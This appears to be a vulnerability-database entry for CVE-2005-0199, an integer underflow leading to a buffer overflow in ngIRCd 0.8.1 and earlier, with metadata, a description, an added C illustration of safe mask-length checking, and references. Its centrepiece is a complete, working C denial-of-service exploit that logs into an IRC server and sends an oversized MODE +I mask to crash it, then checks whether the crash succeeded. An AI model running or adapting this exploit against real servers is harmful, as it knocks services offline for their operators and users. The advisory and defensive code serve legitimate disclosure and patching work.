ngIRCd Remote Buffer Overflow Vulnerability

Vulnerability ID: 1108421
Vulnerability type: Buffer overflow
Published: 2005-01-28
Updated: 2005-10-20
CVE ID: CVE-2005-0199
CNNVD-ID: CNNVD-200505-293
Platform: Linux
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/25070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-293
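|Vulnerability Details
An integer underflow in the Lists_MakeMask() function in lists.c in ngIRCd before 0.8.2 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MODE line that causes an incorrect length calculation, which leads to a buffer overflow.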
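
The incorrect length calculation described above, as an added C illustration (not ngIRCd's source and not part of the original advisory): `naive_copy_limit` shows how subtracting a peer-controlled length from a buffer size wraps around in unsigned arithmetic, and `make_mask_checked` is a hardened form that validates the total length first. `MASK_LEN`, both function names and the simplified nick!user@host normalization are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MASK_LEN 64 /* assumed mask buffer size, chosen for this example */

/* Unsafe pattern: the copy limit is "buffer size minus a length the peer
 * controls". size_t is unsigned, so a host part longer than MASK_LEN makes
 * the subtraction wrap to a huge limit instead of going negative. */
size_t naive_copy_limit(const char *pattern)
{
    const char *at = strchr(pattern, '@');
    return (size_t)MASK_LEN - (at ? strlen(at) : 0);
}

/* Hardened form: compute the full output length first and reject anything
 * that does not fit; no subtraction is done on untrusted lengths.
 * Returns 0 on success, -1 if the mask would not fit in out. */
int make_mask_checked(const char *pattern, char *out, size_t out_len)
{
    const char *excl = strchr(pattern, '!');
    const char *at = strchr(pattern, '@');
    const char *prefix = "", *suffix = "";

    if (at && excl && at < excl) excl = NULL;   /* '!' inside the host part */
    if (!at && !excl)      suffix = "!*@*";     /* bare nick */
    else if (!excl)        prefix = "*!";       /* user@host */
    else if (!at)          suffix = "@*";       /* nick!user */

    size_t need = strlen(prefix) + strlen(pattern) + strlen(suffix) + 1;
    if (need > out_len)
        return -1;
    snprintf(out, out_len, "%s%s%s", prefix, pattern, suffix);
    return 0;
}

int main(void)
{
    char out[MASK_LEN], big[2 * MASK_LEN + 2];

    memset(big, 'A', sizeof big - 1);   /* constructed oversized mask */
    big[MASK_LEN / 2] = '@';
    big[sizeof big - 1] = '\0';

    printf("naive limit: %zu\n", naive_copy_limit(big));
    printf("checked(big): %d\n", make_mask_checked(big, out, sizeof out));
    if (make_mask_checked("nick@host", out, sizeof out) == 0)
        printf("checked(short): %s\n", out);
    return 0;
}
```

Rejecting an oversized mask outright, rather than truncating it, also keeps the stored list entry identical to what the client sent.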
|Exploit (EXP)
source: http://www.securityfocus.com/bid/12397/info

ngIRCd is reported prone to a remote buffer overflow vulnerability. This issue presents itself because the application fails to perform proper boundary checks before copying user-supplied data into process buffers.

A successful attack may allow the attacker to crash the server or gain unauthorized access to a vulnerable computer.

ngIRCd 0.8.1 and prior versions are affected by this vulnerability. 

/*
      NGircd <= 0.8.1     Remote Denial Of Service       Coded by: Expanders

      Usage:  ./ngircd_dos <Host> <Ip> <NickToUse> <ChannellToJoin>

   NOTE:  The channel must be EMPTY to let the exploit use +I mode

      Example:

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {
    struct sockaddr_in trg;
    struct hostent *he;
    int sockfd, buff, rc;
    char evilbuf[1024];
    char buffer[1024];
    char *nick="AntiServer";
    char *channel="Die_NGircd";
    char *request;

    /* Check the argument count before reading the optional arguments. */
    if(argc < 3 ) {
        help(argv[0]);
        exit(0);
    }
    if(argc > 3) nick=argv[3];
    if(argc > 4) channel=argv[4];
    printf("\n\n-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-\n");
    he = gethostbyname(argv[1]);
    if(he == NULL) {
        printf("[Fail] -> Unable to resolve host\n\n");
        return 1;
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    /* argv[2] is used as the TCP port, although the usage text labels it <Ip>. */
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
    printf("\n\nConnecting to target \t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0)
    {
        printf("[Done]\nBuilding evil buffer\t...");
        /* Mask parameter: 300 'A' bytes, one '@', then 128 'A' bytes. */
        memset(evilbuf,0,sizeof(evilbuf));   /* keep the string NUL-terminated */
        memset(evilbuf,65,300);
        memset(evilbuf+300,64,1);
        memset(evilbuf+301,65,128);
        printf("[Done]\nSending NICK           \t...");
        sprintf(request,"NICK %s\n",nick);
        send(sockfd,request,strlen(request),0);
        printf("[Done]\nSending USER           \t...");
        sprintf(request,"USER %s x0n3-h4ck.org eth0.x0n3-h4ck.org :%s\n",nick,nick);
        send(sockfd,request,strlen(request),0);
        buff=recv(sockfd, buffer, 256, 0);
        printf("[Done]\nJoining Channel        \t...");
        sprintf(request,"JOIN #%s\n",channel);
        send(sockfd,request,strlen(request),0);
        printf("[Done]\nSending evil request   \t...");
        /* The long +I mask reaches the length calculation in Lists_MakeMask(). */
        sprintf(request,"MODE #%s +I %s\n",channel,evilbuf);
        send(sockfd,request,strlen(request),0);
        sprintf(request,"QUIT www.x0n3-h4ck.org\n");
        send(sockfd,request,strlen(request),0);
        sleep(2);
        printf("[Done]\nTrying to reconnect\t...");
        close(sockfd);
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        sleep(1);
        /* A refused reconnect means the daemon is no longer running. */
        rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
        if(rc==0)
            printf("[Fail] -> Damn! Attack Failed!\n\n");
        else
            printf("[Done] -> Attack Success! Lets party!\n\n");
    }
    else
        printf("[Fail] -> Unable to connect\n\n");
    close(sockfd);
    free(request);
    return 0;

}

void help(char *program_name) {

    printf("\n\t-=[      NGircd <= 0.8.1 Remote Denial Of Service      ]=-\n");
    printf("\t-=[                                                    ]=-\n");
    printf("\t-=[      Coded by Expanders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
    printf("Usage: %s <Host> <Ip> <NickToUse> <ChannellToJoin>\n",program_name);
}
|References

Source: XF
Name: ngircd-listmakemask-bo(19143)
Link: http://xforce.iss.net/xforce/xfdb/19143
Source: BID
Name: 12397
Link: http://www.securityfocus.com/bid/12397
Source: GENTOO
Name: GLSA-200501-40
Link: http://www.gentoo.org/security/en/glsa/glsa-200501-40.xml
Source: MLIST
Name: [ngIRCd-ML]20050126ngIRCd0.8.2
Link: http://arthur.ath.cx/pipermail/ngircd-ml/2005-January/000228.html
Source: bugs.gentoo.org
Link: http://bugs.gentoo.org/show_bug.cgi?id=79705
Source: SECTRACK
Name: 1013047
Link: http://securitytracker.com/id?1013047
Source: SECUNIA
Name: 14059
Link: http://secunia.com/advisories/14059
Source: SECUNIA
Name: 14056
Link: http://secunia.com/advisories/14056
